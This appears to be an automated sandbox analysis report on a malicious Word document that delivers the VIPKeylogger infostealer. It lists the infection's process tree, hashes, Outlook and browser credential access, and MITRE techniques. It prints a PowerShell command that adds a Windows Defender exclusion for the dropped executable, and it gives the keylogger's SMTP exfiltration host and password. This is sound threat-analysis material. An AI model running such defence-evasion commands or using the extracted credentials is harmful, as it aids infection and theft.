Analysis
-
max time kernel
121s -
max time network
133s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
23-10-2024 10:06
Static task
static1
Behavioral task
behavioral1
Sample
RFQ PO 2.docx
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
RFQ PO 2.docx
Resource
win10v2004-20241007-en
General
-
Target
RFQ PO 2.docx
-
Size
458KB
-
MD5
918f63aeccaa7aeef06d25c031acd858
-
SHA1
7234c8c1a704ee3cb3f9f30f560a02fd0f5ec87c
-
SHA256
2c1e44e7ddf88303822b2a9e7cbfaeedbdbe3ace36ce3e028d19b68cf33c11b3
-
SHA512
aa1bbd9609e92b1e5319c28586ef2a3ce105335f457069ea6c3c05ccde8b1d6b008cdac6f6236fde74a64f3e07695a5eb2ce5041101fbdf95c55c1f885fa7f87
-
SSDEEP
6144:zzbUb0cVLNEzYvRSPlaMXKaAi69qltTGSmNZ5m9tmYL6qoPQ7tmYB/l2mDlJjAIJ:NkF5SPMM6I9X4Xs9mrm9Bt2mhW8G0Y8
Malware Config
Extracted
vipkeylogger
Protocol: smtp- Host:
mail.tonicables.top - Port:
587 - Username:
[email protected] - Password:
7213575aceACE@@ - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Blocklisted process makes network request 1 IoCs
Processes:
EQNEDT32.EXEflow pid process 7 1444 EQNEDT32.EXE -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE 3 IoCs
Processes:
obiddjtrh.exeobiddjtrh.exeobiddjtrh.exepid process 2204 obiddjtrh.exe 2564 obiddjtrh.exe 2428 obiddjtrh.exe -
Loads dropped DLL 2 IoCs
Processes:
EQNEDT32.EXEpid process 1444 EQNEDT32.EXE 1444 EQNEDT32.EXE -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
obiddjtrh.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 obiddjtrh.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 obiddjtrh.exe Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 obiddjtrh.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 checkip.dyndns.org -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
obiddjtrh.exedescription pid process target process PID 2204 set thread context of 2428 2204 obiddjtrh.exe obiddjtrh.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
EQNEDT32.EXEobiddjtrh.exeobiddjtrh.exepowershell.exeWINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EQNEDT32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language obiddjtrh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language obiddjtrh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 1680 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
obiddjtrh.exeobiddjtrh.exepowershell.exepid process 2204 obiddjtrh.exe 2204 obiddjtrh.exe 2204 obiddjtrh.exe 2204 obiddjtrh.exe 2428 obiddjtrh.exe 2468 powershell.exe 2428 obiddjtrh.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
obiddjtrh.exeobiddjtrh.exepowershell.exedescription pid process Token: SeDebugPrivilege 2204 obiddjtrh.exe Token: SeDebugPrivilege 2428 obiddjtrh.exe Token: SeDebugPrivilege 2468 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid process 1680 WINWORD.EXE 1680 WINWORD.EXE -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
EQNEDT32.EXEobiddjtrh.exeWINWORD.EXEdescription pid process target process PID 1444 wrote to memory of 2204 1444 EQNEDT32.EXE obiddjtrh.exe PID 1444 wrote to memory of 2204 1444 EQNEDT32.EXE obiddjtrh.exe PID 1444 wrote to memory of 2204 1444 EQNEDT32.EXE obiddjtrh.exe PID 1444 wrote to memory of 2204 1444 EQNEDT32.EXE obiddjtrh.exe PID 2204 wrote to memory of 2468 2204 obiddjtrh.exe powershell.exe PID 2204 wrote to memory of 2468 2204 obiddjtrh.exe powershell.exe PID 2204 wrote to memory of 2468 2204 obiddjtrh.exe powershell.exe PID 2204 wrote to memory of 2468 2204 obiddjtrh.exe powershell.exe PID 2204 wrote to memory of 2564 2204 obiddjtrh.exe obiddjtrh.exe PID 2204 wrote to memory of 2564 2204 obiddjtrh.exe obiddjtrh.exe PID 2204 wrote to memory of 2564 2204 obiddjtrh.exe obiddjtrh.exe PID 2204 wrote to memory of 2564 2204 obiddjtrh.exe obiddjtrh.exe PID 2204 wrote to memory of 2428 2204 obiddjtrh.exe obiddjtrh.exe PID 2204 wrote to memory of 2428 2204 obiddjtrh.exe obiddjtrh.exe PID 2204 wrote to memory of 2428 2204 obiddjtrh.exe obiddjtrh.exe PID 2204 wrote to memory of 2428 2204 obiddjtrh.exe obiddjtrh.exe PID 2204 wrote to memory of 2428 2204 obiddjtrh.exe obiddjtrh.exe PID 2204 wrote to memory of 2428 2204 obiddjtrh.exe obiddjtrh.exe PID 2204 wrote to memory of 2428 2204 obiddjtrh.exe obiddjtrh.exe PID 2204 wrote to memory of 2428 2204 obiddjtrh.exe obiddjtrh.exe PID 2204 wrote to memory of 2428 2204 obiddjtrh.exe obiddjtrh.exe PID 1680 wrote to memory of 2548 1680 WINWORD.EXE splwow64.exe PID 1680 wrote to memory of 2548 1680 WINWORD.EXE splwow64.exe PID 1680 wrote to memory of 2548 1680 WINWORD.EXE splwow64.exe PID 1680 wrote to memory of 2548 1680 WINWORD.EXE splwow64.exe -
outlook_office_path 1 IoCs
Processes:
obiddjtrh.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 obiddjtrh.exe -
outlook_win_path 1 IoCs
Processes:
obiddjtrh.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 obiddjtrh.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ PO 2.docx"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2548
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Users\Admin\AppData\Roaming\obiddjtrh.exe"C:\Users\Admin\AppData\Roaming\obiddjtrh.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\obiddjtrh.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468
-
-
C:\Users\Admin\AppData\Roaming\obiddjtrh.exe"C:\Users\Admin\AppData\Roaming\obiddjtrh.exe"3⤵
- Executes dropped EXE
PID:2564
-
-
C:\Users\Admin\AppData\Roaming\obiddjtrh.exe"C:\Users\Admin\AppData\Roaming\obiddjtrh.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2428
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Exploitation for Client Execution
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{1247DD2D-3272-4038-A20F-8AE4FFDA0787}.FSD
Filesize128KB
MD59ced85241b91d1da1a17c5facd482e05
SHA1d7a87004beb0710bbe4456046442e40e81dd88a9
SHA25614b06e4e76d50e478b67f0696914f3f76c25db13d34ac7bc3cafb59ddc4c044a
SHA5127020a9cc0269900ad22e02797df8f2f071850b9e8776695c83d3880351b1f8b107dc851a10d4bb4eb26ab949d8d4f6588a33476cfffa4a801cf32adaee7d7e0b
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
Filesize128KB
MD5bf3f1023b2631463966f355b60846c49
SHA1cea9b7988b4e2459bfbc4fe3b18fb7a22f325477
SHA25688efbd7fb48c3e0f6581ef9e78d09650db5315747ec0e3ceee9ea1d5aa717e2b
SHA5120e01d31b8d3640c790376ce2f43da4d4a8df29b1731c479f8ec1b60e35b3e6946039fb9365398c689c81648d06d2c67e035a63041963d1ebcf01095ed8742bf4
-
C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{FC6607DB-CD33-4982-B836-620E593AC738}.FSD
Filesize128KB
MD5de7cbb3dbb3f3b74235e6c3e9a2f5c18
SHA19bf4d8215af862e12249fe79138ebe0bed2293da
SHA25652b64b1b1d8034ff878310a482bc79c5d40c22b25e56ac9ecf851464db37926b
SHA5121d1efcdeb5dd3576172c6bfeb6460c44fcd88af31201fffec69a668358684cc221ac9950261a019af82d11754feacddb393baea3194ab7663585c5a0b916ff43
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DUME8XYE\mnobizxv[1].doc
Filesize670KB
MD5c00a17e56e7eeaf2d72456692c36eec7
SHA172fbbce62454aaa611317d1c23a1980712d44613
SHA256ee1c72ebaf43badfd7469960a19c0b2c54dc7485eff720cab2eb6bb9cf623c04
SHA512ba0273b1afeb40e3c877fadc20e3ab3960e4db79272b042e500bc896d3986f607de401a2c300f97c42442e2ce4a03c241913a62439e96ff73b9795ad6527db97
-
Filesize
128KB
MD5695acb97252394349c7b336a95692351
SHA156d1dad9d474902d19fdcc8e51e554016d12d6fe
SHA256699afb0617d3d5c1bb8ecd6dad0299a3b834285d2097127af30874eaee719518
SHA512381766c3dff8c394ff3c4d36f783dabc6c975719057682415aeca99b340553cd808b55fd31fbb2e61ace39cf2d2cf6129660cc5dc55fabcf989065e6fd2ed56c
-
Filesize
412B
MD5080d84d06e96e51fd365b7fb6cdd073e
SHA12b07b84b522b8b52b5419ffbe36601b678e5109c
SHA256da15367cb302dfa30fb3bd6081060479e86515f2c0e48a0b44098ce7d63beb6b
SHA51277e8bbefc9f8553bf1b1797af60856f32ab499c7e2417a87de5304f987890aab095e306cdd0dfc4a091f78b7a7a76751f3a40e3507c24318561d2e42c6cc89f2
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
759KB
MD57578316e563e8a4a2983ae041a5fff39
SHA1fa5a6777784f272b191803d03a49dfe40354bcf2
SHA2562b845ff4c5ee973861ccb905e73fed0bbd46ce5e311fc8910d188ec839226f58
SHA512225fa056dff9c59915fbfe593d3d336c133eeab6be80f48de976f8d14cd773bde21716f489b45c007310da6eb61c9bd6681a7ec0a80559b246af07a1346dc9ba